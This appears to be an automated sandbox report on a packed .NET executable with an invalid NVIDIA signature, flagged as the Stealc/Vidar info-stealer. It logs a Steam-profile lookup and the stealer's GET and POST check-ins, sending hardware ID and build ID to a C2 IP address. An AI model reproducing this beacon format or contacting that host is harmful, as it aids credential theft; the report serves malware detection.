Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63be8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63ab0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61c44	0x61e00	e1b9391403e8b5dd041d05b44b7fd743	False	0.9938338122605364	data	7.995811814167676	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5c8	0x600	db1daa9db276719b7dce2f7fee59adb7	False	0.4361979166666667	data	4.115782972549961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	668ddc03321cdfb17f8be719cbc539e8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x643d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T19:49:32.179378+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49740	5.75.211.162	443	TCP
2024-09-26T19:49:33.384870+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49741	5.75.211.162	443	TCP
2024-09-26T19:49:34.954154+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49742	5.75.211.162	443	TCP
2024-09-26T19:49:36.833518+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49743	5.75.211.162	443	TCP
2024-09-26T19:49:37.670343+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.4	49743	TCP
2024-09-26T19:49:38.321713+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49744	5.75.211.162	443	TCP
2024-09-26T19:49:39.047099+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49744	5.75.211.162	443	TCP
2024-09-26T19:49:39.047255+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.4	49744	TCP
2024-09-26T19:49:52.524007+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49752	5.75.211.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 19:49:29.943981886 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:29.944034100 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:29.944206953 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:29.950375080 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:29.950392008 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:30.605416059 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:30.605540991 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:30.705694914 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:30.705729008 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:30.706187010 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:30.708195925 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:30.712035894 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:30.759404898 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.135174990 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.135207891 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.135252953 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.135319948 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.135358095 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.135376930 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.135405064 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.235779047 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.235802889 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.235883951 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.235896111 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.235939026 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.240860939 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.240941048 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.240947008 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.240964890 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.240989923 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.241022110 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.241302967 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 19:49:31.241321087 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 19:49:31.252790928 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:31.252932072 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:31.253011942 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:31.253381014 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:31.253418922 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.179227114 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.179378033 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.188134909 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.188153028 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.188352108 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.188401937 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.188694954 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.235459089 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.692516088 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.692646980 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.692682981 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.692769051 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.695744038 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.695796013 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.698353052 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.698406935 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:32.698493004 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.698765039 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:32.698781967 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:33.384660006 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:33.384870052 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:33.385421991 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:33.385435104 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:33.387629986 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:33.387635946 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.149777889 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.149857044 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.149914980 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.149950027 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.150275946 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.150294065 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.152062893 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.152091026 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.152159929 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.152410984 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.152424097 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.954054117 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.954154015 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.954724073 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.954735041 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:34.956872940 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:34.956878901 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:35.655519962 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:35.655545950 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:35.655608892 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:35.655613899 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:35.655657053 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:35.655975103 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:35.655994892 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:35.658073902 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:35.658128023 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:35.658211946 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:35.658435106 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:35.658447981 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:36.833436966 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:36.833518028 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:36.833981037 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:36.833995104 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:36.836066008 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:36.836071968 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:37.670162916 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:37.670188904 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:37.670236111 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:37.670253992 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:37.670265913 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:37.670314074 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:37.670773029 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:37.670800924 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:37.673362970 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:37.673405886 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:37.673511028 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:37.673779011 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:37.673794031 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:38.321634054 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:38.321712971 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:38.337447882 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:38.337462902 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:38.347235918 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:38.347245932 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:39.047061920 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:39.047136068 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:39.047142029 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:39.047205925 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:39.047450066 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:39.047494888 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:51.777182102 CEST	49752	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:51.777230024 CEST	443	49752	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:51.777306080 CEST	49752	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:51.777857065 CEST	49752	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:51.777873039 CEST	443	49752	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:52.523938894 CEST	443	49752	5.75.211.162	192.168.2.4
Sep 26, 2024 19:49:52.524007082 CEST	49752	443	192.168.2.4	5.75.211.162
Sep 26, 2024 19:49:52.640487909 CEST	49752	443	192.168.2.4	5.75.211.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 19:49:29.931256056 CEST	55286	53	192.168.2.4	1.1.1.1
Sep 26, 2024 19:49:29.939227104 CEST	53	55286	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 19:49:29.931256056 CEST	192.168.2.4	1.1.1.1	0x4fee	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 19:49:29.939227104 CEST	1.1.1.1	192.168.2.4	0x4fee	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

5.75.211.162

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	104.102.49.254	443	5676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 17:49:30 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 17:49:31 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 17:49:31 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=d1ab3d0c8b19a33f54ded9b6; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 17:49:31 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 17:49:31 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 17:49:31 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 17:49:31 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	5.75.211.162	443	5676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 17:49:32 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 17:49:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 17:49:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 17:49:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	5.75.211.162	443	5676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 17:49:33 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 17:49:33 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 42 43 36 30 39 38 37 39 33 37 32 38 32 37 36 38 36 39 39 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="hwid"F9BC609879372827686991-a33c7340-61ca------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------CBFCBKKFBAEHJKEBKFCB--
2024-09-26 17:49:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 17:49:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
